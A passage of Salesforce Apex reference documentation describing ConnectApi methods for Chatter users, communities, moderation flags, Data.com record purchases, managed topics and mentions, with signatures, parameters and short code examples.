public static ConnectApi.UserPage getUsers(String communityId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.UserPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserPage getUsers(String communityId, Integer pageParam,
Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
886
Reference
ChatterUsers Class
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.UserPage
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserGroupPage searchUserGroups(String communityId, String
userId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.UserGroupPage
A paginated list of groups the context user is a member of.
887
Reference
ChatterUsers Class
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserGroupPage searchUserGroups(String communityId, String
userId, String q, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.UserGroupPage
A paginated list of groups the context user is a member of.
888
Reference
ChatterUsers Class
searchUsers(String, String)
Returns the first page of users that match the specified search criteria. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserPage searchUsers(String communityId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.UserPage
API Version
28.0
Requires Chatter
Yes
889
Reference
ChatterUsers Class
Signature
public static ConnectApi.UserPage searchUsers(String communityId, String q, Integer
pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.UserPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserPage searchUsers(String communityId, String q, String
searchContextId, Integer pageParam, Integer pageSize)
890
Reference
ChatterUsers Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
searchContextId
Type: String
A feed item ID that filters search results for feed @mentions. More useful results are listed first. When you specify this argument, you
cannot query more than 500 results and you cannot use wildcards in the search term.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.UserPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhoto(String communityId, String userId, String
fileId, Integer versionNumber)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
891
Reference
ChatterUsers Class
userId
Type: String
The ID for the context user or the keyword me.
fileId
Type: String
ID of a file already uploaded. The file must be an image, and be smaller than 2 MB.
versionNumber
Type: Integer
Version number of the existing file. Specify either an existing version number, or null to get the latest version.
Return Value
Type: ConnectApi.Photo
Usage
Photos are processed asynchronously and may not be visible right away.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhoto(String communityId, String userId,
ConnectApi.BinaryInput fileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
fileUpload
Type: ConnectApi.BinaryInput
A file to use as the photo. The content type must be usable as an image.
892
Reference
ChatterUsers Class
Return Value
Type: ConnectApi.Photo
Usage
Photos are processed asynchronously and may not be visible right away.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhotoWithAttributes(String communityId, String userId,
ConnectApi.PhotoInput photo)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
photo
Type: ConnectApi.PhotoInput
A ConnectApi.PhotoInput object specifying the file ID, version number, and cropping parameters.
Return Value
Type: ConnectApi.Photo
Usage
Photos are processed asynchronously and may not be visible right away.
893
Reference
ChatterUsers Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhotoWithAttributes(String communityId, String userId,
ConnectApi.PhotoInput photo, ConnectApi.BinaryInput fileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
photo
Type: ConnectApi.PhotoInput
A ConnectApi.PhotoInput object specifying the cropping parameters.
fileUpload
Type: ConnectApi.BinaryInput
A file to use as the photo. The content type must be usable as an image.
Return Value
Type: ConnectApi.Photo
Usage
Photos are processed asynchronously and may not be visible right away.
API Version
28.0
Requires Chatter
Yes
894
Reference
ChatterUsers Class
Signature
public static ConnectApi.UserChatterSettings updateChatterSettings(String communityId,
String userId, ConnectApi.GroupEmailFrequency defaultGroupEmailFrequency)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
defaultGroupEmailFrequency
Type: ConnectApi.GroupEmailFrequency
defaultGroupEmailFrequencySpecifies the frequency with which a user receives email from a group. Values:
EachPost
DailyDigest
WeeklyDigest
Never
UseDefault
Dont pass the value UseDefault for the defaultGroupEmailFrequency parameter because calling
updateChatterSettings sets the default value.
Return Value
Type: ConnectApi.UserChatterSettings
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserDetail updateUser(String communityId, String userId,
ConnectApi.UserInput userInput)
895
Reference
ChatterUsers Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
userInput
Type: ConnectApi.UserInput
Return Value
Type: ConnectApi.UserDetail
API Version
28.0
Signature
public static Void setTestSearchUsers(String communityId, String q, ConnectApi.UserPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.UserPage
896
Reference
ChatterUsers Class
Return Value
Type: Void
API Version
28.0
Signature
public static Void setTestSearchUsers(String communityId, String q, Integer pageParam,
Integer pageSize, ConnectApi.UserPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.UserPage
The object containing test data.
Return Value
Type: Void
897
Reference
Communities Class
API Version
28.0
Signature
public static Void setTestSearchUsers(String communityId, String q, String
searchContextId, Integer pageParam, Integer pageSize, ConnectApi.UserPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
searchContextId
Type: String
A feed item ID that filters search results for feed @mentions. More useful results are listed first. When you specify this argument, you
cannot query more than 500 results and you cannot use wildcards in the search term.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.UserPage
The object containing test data.
Return Value
Type: Void
Communities Class
Access general information about communities in your organization.
Namespace
ConnectApi
898
Reference
Communities Class
Communities Methods
The following are methods for Communities. All methods are static.
IN THIS SECTION:
getCommunities()
Returns a list of communities the context user has access to.
getCommunities(ConnectApi.CommunityStatus)
Returns a list of communities the context user has access to with the specified status.
getCommunity(String)
Returns information about the specific community.
getCommunities()
Returns a list of communities the context user has access to.
API Version
28.0
Requires Chatter
No
Signature
public static ConnectApi.CommunityPage getCommunities()
Return Value
Type: ConnectApi.CommunityPage
getCommunities(ConnectApi.CommunityStatus)
Returns a list of communities the context user has access to with the specified status.
API Version
28.0
Requires Chatter
No
Signature
public static ConnectApi.CommunityPage getCommunities(ConnectApi.CommunityStatus
communityStatus)
899
Reference
CommunityModeration Class
Parameters
communityStatus
Type: ConnectApi.CommunityStatus
communityStatusSpecifies the current status of the community. Values are:
Live
Inactive
UnderConstruction
Return Value
Type: ConnectApi.CommunityPage
getCommunity(String)
Returns information about the specific community.
API Version
28.0
Requires Chatter
No
Signature
public static ConnectApi.Community getCommunity(String communityId)
Parameters
communityId
Type: String
You must specify an ID for communityId. You cannot specify null or 'internal'.
Return Value
Type: ConnectApi.Community
CommunityModeration Class
Access information about flags feed items and comments in a community. Add and remove one or more flags to and from comments
and feed items. To view a feed containing all flagged feed items and comments, pass ConnectApi.FeedType.Moderation
to the ConnectApi.ChatterFeeds.getFeedItemsFromFeed method.
Namespace
ConnectApi
900
Reference
CommunityModeration Class
CommunityModeration Methods
The following are methods for CommunityModeration. All methods are static.
IN THIS SECTION:
addFlagToComment(String, String)
Add a moderation flag to a comment. To add a flag to a comment, Allow members to flag content must be selected
for a community.
addFlagToComment(String, String, ConnectApi.CommunityFlagVisibility)
Add a moderation flag with specified visibility to a comment. To add a flag to a comment, Allow members to flag
content must be selected for a community.
addFlagToFeedElement(String, String)
Add a moderation flag to a feed element. To add a flag to a feed element, Allow members to flag content must be
selected for a community.
addFlagToFeedElement(String, String, ConnectApi.CommunityFlagVisibility)
Add a moderation flag with specified visibility to a feed element. To add a flag to a feed element, Allow members to flag
content must be selected for a community.
addFlagToFeedItem(String, String)
Add a moderation flag to a feed item. To add a flag to a feed item, Allow members to flag content must be selected
for a community.
addFlagToFeedItem(String, String, ConnectApi.CommunityFlagVisibility)
Add a moderation flag with specified visibility to a feed item. To add a flag to a feed item, Allow members to flag
content must be selected for a community.
getFlagsOnComment(String, String)
Get the moderation flags on a comment. To get the flags, the context user must have the Moderate Communities Feeds permission.
getFlagsOnComment(String, String, ConnectApi.CommunityFlagVisibility)
Get the moderation flags with specified visibility on a comment. To get the flags, the context user must have the Moderate
Communities Feeds permission.
getFlagsOnFeedElement(String, String)
Get the moderation flags on a feed element. To get the flags, the context user must have the Moderate Communities
Feeds permission.
getFlagsOnFeedElement(String, String, ConnectApi.CommunityFlagVisibility)
Get the moderation flags with specified visibility on a feed element. To get the flags, the context user must have the Moderate
Communities Feeds permission.
getFlagsOnFeedItem(String, String)
Get the moderation flags on a feed item. To get the flags, the context user must have the Moderate Communities Feeds permission.
getFlagsOnFeedItem(String, String, ConnectApi.CommunityFlagVisibility)
Get the moderation flags with specified visibility on a feed item. To get the flags, the context user must have the Moderate
Communities Feeds permission.
removeFlagFromComment(String, String, String)
Remove a moderation flag from a comment. To remove a flag from a comment the context user must have added the flag or must
have the Moderate Communities Feeds permission.
901
Reference
CommunityModeration Class
addFlagToComment(String, String)
Add a moderation flag to a comment. To add a flag to a comment, Allow members to flag content must be selected for
a community.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags addFlagToComment(String communityId, String
commentId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
Return Value
Type: ConnectApi.ModerationFlags
API Version
30.0
902
Reference
CommunityModeration Class
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags addFlagToComment(String communityId, String
commentId, ConnectApi.CommunityFlagVisibility visibility)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
visibility
Type: ConnectApi.CommunityFlagVisibility
Return Value
Type: ConnectApi.ModerationFlags
addFlagToFeedElement(String, String)
Add a moderation flag to a feed element. To add a flag to a feed element, Allow members to flag content must be selected
for a community.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationCapability addFlagToFeedElement(String communityId,
String feedElementId)
903
Reference
CommunityModeration Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.ModerationCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationCapability addFlagToFeedElement(String communityId,
String feedElementId, ConnectApi.CommunityFlagVisibility visibility)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
visibility
Type: ConnectApi.CommunityFlagVisibility
Specifies the visibility behavior of a flag for various user types. One of these values:
ModeratorsOnlyThe flag is visible only to users with moderation permissions on the flagged element or item.
SelfAndModeratorsThe flag is visible to the creator of the flag and to users with moderation permissions on the flagged
element or item.
904
Reference
CommunityModeration Class
Return Value
Type: ConnectApi.ModerationCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
addFlagToFeedItem(String, String)
Add a moderation flag to a feed item. To add a flag to a feed item, Allow members to flag content must be selected for
a community.
API Version
29.031.0
Important: In version 32.0 and later, use addFlagToFeedElement(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags addFlagToFeedItem(String communityId, String
feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
Return Value
Type: ConnectApi.ModerationFlags
API Version
30.031.0
Important: In version 32.0 and later, use addFlagToFeedElement(String, String, ConnectApi.CommunityFlagVisibility).
905
Reference
CommunityModeration Class
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags addFlagToFeedItem(String communityId, String
feedItemId, ConnectApi.CommunityFlagVisibility visibility)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
visibility
Type: ConnectApi.CommunityFlagVisibility
Return Value
Type: ConnectApi.ModerationFlags
getFlagsOnComment(String, String)
Get the moderation flags on a comment. To get the flags, the context user must have the Moderate Communities Feeds permission.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags getFlagsOnComment(String communityId, String
commentId)
Parameters
communityId
Type: String
906
Reference
CommunityModeration Class
Type: String
The ID for a comment.
Return Value
Type: ConnectApi.ModerationFlags
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags getFlagsOnComment(String communityId, String
commentId, ConnectApi.CommunityFlagVisibility visibility)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
visibility
Type: ConnectApi.CommunityFlagVisibility
Return Value
Type: ConnectApi.ModerationFlags
907
Reference
CommunityModeration Class
getFlagsOnFeedElement(String, String)
Get the moderation flags on a feed element. To get the flags, the context user must have the Moderate Communities Feeds
permission.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationCapability getFlagsOnFeedElement(String communityId,
String feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.ModerationCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationCapability getFlagsOnFeedElement(String communityId,
String feedElementId, ConnectApi.CommunityFlagVisibility visibility)
908
Reference
CommunityModeration Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
visibility
Type: ConnectApi.CommunityFlagVisibility
Specifies the visibility behavior of a flag for various user types. One of these values:
ModeratorsOnlyThe flag is visible only to users with moderation permissions on the flagged element or item.
SelfAndModeratorsThe flag is visible to the creator of the flag and to users with moderation permissions on the flagged
element or item.
Return Value
Type: ConnectApi.ModerationCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
getFlagsOnFeedItem(String, String)
Get the moderation flags on a feed item. To get the flags, the context user must have the Moderate Communities Feeds permission.
API Version
29.031.0
Important: In version 32.0 and later, use getFlagsOnFeedElement(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags getFlagsOnFeedItem(String communityId, String
feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
909
Reference
CommunityModeration Class
Return Value
Type: ConnectApi.ModerationFlags
API Version
30.031.0
Important: In version 32.0 and later, use getFlagsOnFeedElement(String, String, ConnectApi.CommunityFlagVisibility).
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags getFlagsOnFeedItem(String communityId, String
feedItemId, ConnectApi.CommunityFlagVisibility visibility)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
visibility
Type: ConnectApi.CommunityFlagVisibility
Return Value
Type: ConnectApi.ModerationFlags
910
Reference
CommunityModeration Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags removeFlagsOnComment(String communityId, String
commentId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
userId
Type: String
The ID for a user.
Return Value
Type: Void
API Version
31.0
Requires Chatter
Yes
Signature
public static void removeFlagFromFeedElement(String communityId, String feedElementId,
String userId)
911
Reference
CommunityModeration Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.ModerationCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
API Version
29.031.0
Important: In version 32.0 and later, use removeFlagFromFeedElement(String, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.ModerationFlags removeFlagsOnFeedItem(String communityId,
String feedItemId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
userId
Type: String
912
Reference
Datacloud Class
Return Value
Type: Void
Datacloud Class
Purchase Data.com contact or company records, and retrieve purchase information.
Namespace
ConnectApi.Datacloud
Usage
Use the ConnectApi.Datacloud class to purchase contact or company records from Data.com by using points, and get Data.com record
purchase information for your organization.
IN THIS SECTION:
Datacloud Methods
Datacloud Methods
The following are methods for Datacloud. All methods are static.
IN THIS SECTION:
getCompaniesFromOrder(String, String, String)
Retrieves a list of purchased company records for a specific orderId, call getCompaniesFromOrder(orderId, page,
pageSize).
getCompany(String)
Retrieves a company record from an identification number, call getCompany(companyId).
getContact(String)
Retrieves a contact record from an identification number, call getContact(contactId).
getContactsFromOrder(String, String, String)
Retrieves a list of purchased contacts for a specific orderId , call getContactsFromOrder(orderId, page,
pageSize).
getOrder(String)
Retrieves purchased records for a specific orderId , call getOrder(orderId).
getUsage(String)
Retrieves purchase usage information for a specific user, call getUsage(userId).
postOrder(ConnectApi.DatacloudOrderInput)
Purchase records that are listed in an input file, call postOrder(ConnectApi.DatacloudOrderInput orderInput).
913
Reference
Datacloud Class
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudCompanies getCompaniesFromOrder(String orderId, String
pageSize, String page)
Parameters
orderId
Type: String
A unique number that identifies an order.
page
Type: String
The number of the page that you want returned.
pageSize
Type: String
The number of companies to show on a page. The default pageSize is 25.
Return Value
Type: ConnectApi.DatacloudCompanies
getCompany(String)
Retrieves a company record from an identification number, call getCompany(companyId).
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudCompany getCompany(String companyId)
914
Reference
Datacloud Class
Parameters
companyId
Type: String
A numeric identifier for a company in the Data.com database.
Return Value
Type: ConnectApi.DatacloudCompany
Example
ConnectApi.DatacloudCompany DatacloudCompanyRep = ConnectApi.Datacloud.getCompany(companyId);
getContact(String)
Retrieves a contact record from an identification number, call getContact(contactId).
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudContact getContact(String contactId)
Parameters
contactId
Type: String
A unique numeric string that identifies a contact in the Data.com database.
Return Value
Type: ConnectApi.DatacloudContact
Example
ConnectApi.DatacloudContact DatacloudContactRep = ConnectApi.Datacloud.getContact(contactId);
915
Reference
Datacloud Class
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudContacts getContactsFromOrder(String orderId, String
page, String pageSize)
Parameters
orderId
Type: String
A unique number thats associated with an order.
page
Type: String
The number of the page that you want returned.
pageSize
Type: String
The number of contacts to show on a page. The default pageSize is 25.
Return Value
Type: ConnectApi.DatacloudContacts
getOrder(String)
Retrieves purchased records for a specific orderId , call getOrder(orderId).
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudOrder getOrder(String orderId)
Parameters
orderId
Type: String
916
Reference
Datacloud Class
Return Value
Type: ConnectApi.DatacloudOrder
Example
ConnectApi.DatacloudOrder datacloudOrderRep = ConnectApi.Datacloud.getOrder(orderId);
getUsage(String)
Retrieves purchase usage information for a specific user, call getUsage(userId).
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.DatacloudPurchaseUsage getUsage(String userId)
Parameters
userId
Type: String
A unique number that identifies a single user.
Return Value
Type: ConnectApi.DatacloudPurchaseUsage
Example
ConnectApi.DatacloudPurchaseUsage datacloudPurchaseUsageRep =
ConnectApi.Datacloud.getUsage(userId);
postOrder(ConnectApi.DatacloudOrderInput)
Purchase records that are listed in an input file, call postOrder(ConnectApi.DatacloudOrderInput orderInput).
API Version
32.0
917
Reference
ManagedTopics Class
Requires Chatter
No
Signature
public static ConnectApi.DatacloudOrder postOrder(ConnectApi.DatacloudOrderInput
orderInput)
Parameters
orderInput
Type: ConnectApi.DatacloudOrderInput
A list that contains IDs for the contacts or companies that you want to see.
Return Value
Type: ConnectApi.DatacloudOrder
Example
ConnectApi.DatacloudOrderInput inputOrder=new ConnectApi.DatacloudOrderInput();
List<String> ids=new List<String>();
ids.add('1234');
inputOrder.companyIds=ids;
ConnectApi.DatacloudOrder datacloudOrderRep = ConnectApi.Datacloud.postOrder(inputOrder);
ManagedTopics Class
Access information about managed topics in a community. Create, delete, and reorder managed topics.
Namespace
ConnectApi
ManagedTopics Methods
The following are methods for ManagedTopics. All methods are static.
IN THIS SECTION:
createManagedTopic(String, String, ConnectApi.ManagedTopicType)
Creates a managed topic of a specific type for the specified community.
createManagedTopicByName(String, String, ConnectApi.ManagedTopicType)
Creates a managed topic of a specific type by name for the specified community.
deleteManagedTopic(String, String)
Deletes a managed topic from the specified community.
918
Reference
ManagedTopics Class
getManagedTopic(String, String)
Returns information about a managed topic in a community.
getManagedTopics(String)
Returns the managed topics for the community.
getManagedTopics(String, ConnectApi.ManagedTopicType)
Returns managed topics of a specified type for the community.
reorderManagedTopics(String, ConnectApi.ManagedTopicPositionCollectionInput)
Reorders the relative positions of managed topics in a community.
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.ManagedTopic createManagedTopic(String communityId, String
recordId, ConnectApi.ManagedTopicType managedTopicType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
ID of the topic.
managedTopicType
Type: ConnectApi.ManagedTopicType
Return Value
Type: ConnectApi.ManagedTopic
919
Reference
ManagedTopics Class
Usage
Only community managers (users with the Create and Set Up Communities or Manage Communities permission) can create managed
topics.
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.ManagedTopic createManagedTopicByName(String communityId,
String name, ConnectApi.ManagedTopicType managedTopicType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
name
Type: String
Name of the topic.
managedTopicType
Type: ConnectApi.ManagedTopicType
Return Value
Type: ConnectApi.ManagedTopic
Usage
Only community managers (users with the Create and Set Up Communities or Manage Communities permission) can create managed
topics.
920
Reference
ManagedTopics Class
deleteManagedTopic(String, String)
Deletes a managed topic from the specified community.
API Version
32.0
Requires Chatter
No
Signature
public static deleteManagedTopic(String communityId, String managedTopicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
managedTopicId
Type: String
ID of managed topic.
Return Value
Type: Void
Usage
Only community managers (users with the Create and Set Up Communities or Manage Communities permission) can delete managed
topics.
getManagedTopic(String, String)
Returns information about a managed topic in a community.
API Version
32.0
Requires Chatter
No
921
Reference
ManagedTopics Class
Signature
public static ConnectApi.ManagedTopic getManagedTopic(String communityId, String
managedTopicId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
managedTopicId
Type: String
ID of managed topic.
Return Value
Type: ConnectApi.ManagedTopic
getManagedTopics(String)
Returns the managed topics for the community.
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.ManagedTopicCollection getManagedTopics(String communityId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.ManagedTopicCollection
922
Reference
ManagedTopics Class
getManagedTopics(String, ConnectApi.ManagedTopicType)
Returns managed topics of a specified type for the community.
API Version
32.0
Requires Chatter
No
Signature
public static ConnectApi.ManagedTopicCollection getManagedTopics(String communityId,
ConnectApi.ManagedTopicType managedTopicType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
managedTopicType
Type: ConnectApi.ManagedTopicType
Return Value
Type: ConnectApi.ManagedTopicCollection
reorderManagedTopics(String, ConnectApi.ManagedTopicPositionCollectionInput)
Reorders the relative positions of managed topics in a community.
API Version
32.0
Requires Chatter
No
923
Reference
ManagedTopics Class
Signature
public static ConnectApi.ManagedTopicCollection reorderManagedTopics(String communityId,
ConnectApi.ManagedTopicPositionCollectionInput managedTopicPositionCollection)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
managedTopicPositionCollection
Type: ConnectApi.ManagedTopicPositionCollectionInput
A collection of relative positions of managed topics. This collection can include Featured and Navigational managed
topics and doesnt need to include all managed topics.
Return Value
Type: ConnectApi.ManagedTopicCollection
Usage
Only community managers (users with the Create and Set Up Communities or Manage Communities permission) can reorder managed
topics.
If you dont include all managed topics in the ConnectApi.ManagedTopicPositionCollectionInput, the managed
topics are reordered by respecting the positions indicated in the ConnectApi.ManagedTopicPositionCollectionInput
and then by pushing down any managed topics that arent included in the
ConnectApi.ManagedTopicPositionCollectionInput to the next available position.
Example
If you have these managed topics:
Managed Topic
Position
ManagedTopicA
ManagedTopicB
ManagedTopicC
ManagedTopicD
ManagedTopicE
Position
ManagedTopicD
ManagedTopicE
924
Reference
Mentions Class
Position
ManagedTopicD
ManagedTopicA
ManagedTopicE
ManagedTopicB
ManagedTopicC
Mentions Class
Access information about mentions. A mention is an @ character followed by a user or group name. When a user or group is mentioned,
they receive a notification.
Namespace
ConnectApi
Mentions Methods
The following are methods for Mentions. All methods are static.
IN THIS SECTION:
getMentionCompletions(String, String, String)
Returns the first page of possible users and groups to mention in a feed item body or comment body. A mention is an @ character
followed by a user or group name. When a user or group is mentioned, they receive a notification.
getMentionCompletions(String, String, String, ConnectApi.MentionCompletionType, Integer, Integer)
Returns the specified page number of mention proposals of the specified mention completion type: All, User, or Group. A mention
is an @ character followed by a user or group name. When a user or group is mentioned, they receive a notification.
getMentionValidations(String, String, List<String>, ConnectApi.FeedItemVisibilityType)
Information about whether the specified mentions are valid for the context user.
API Version
29.0
Requires Chatter
Yes
925
Reference
Mentions Class
Signature
public static ConnectApi.MentionCompletionPage getMentionCompletions (String communityId,
String q, String contextId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
A search term. Searches for matching user and group names. To search for a user, a minimum of 1 character is required. To search
for a group, a minimum of 2 characters is required. This parameter does not support wildcards.
contextId
Type: String
A feed item ID (for a mention in a comment) or a feed subject ID (for a mention in a feed item) that narrows search results, with
more useful results listed first.
Return Value
Type: ConnectApi.MentionCompletionPage
Usage
Call this method to generate a page of proposed mentions that a user can choose from when they enter characters in a feed item body
or a comment body.
SEE ALSO:
setTestGetMentionCompletions(String, String, String, ConnectApi.MentionCompletionPage)
Testing ConnectApi Code
API Version
29.0
Requires Chatter
Yes
926
Reference
Mentions Class
Signature
public static ConnectApi.Mentions getMentionCompletions (String communityId, String q,
String contextId, ConnectApi.MentionCompletionType type, Integer pageParam, Integer
pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
A search term. Searches for matching user and group names. To search for a user, a minimum of 1 character is required. To search
for a group, a minimum of 2 characters is required. This parameter does not support wildcards.
contextId
Type: String
A feed item ID (for a mention in a comment) or a feed subject ID (for a mention in a feed item) that narrows search results, with
more useful results listed first.
type
Type: ConnectApi.MentionCompletionType
Specifies the type of mention completion:
AllAll mention completions, regardless of the type of record to which the mention refers.
GroupMention completions for groups.
UserMention completions for users.
pageParam
Type: String
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: String
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.MentionCompletionPage
Usage
Call this method to generate a page of proposed mentions that a user can choose from when they enter characters in a feed item body
or a comment body.
SEE ALSO:
setTestGetMentionCompletions(String, String, String, ConnectApi.MentionCompletionType, Integer, Integer,
ConnectApi.MentionCompletionPage)
Testing ConnectApi Code
927
Reference
Mentions Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.Mentions getMentionValidations(String communityId, String
parentId, List<String> recordIds, ConnectApi.FeedItemVisibilityType visibility)
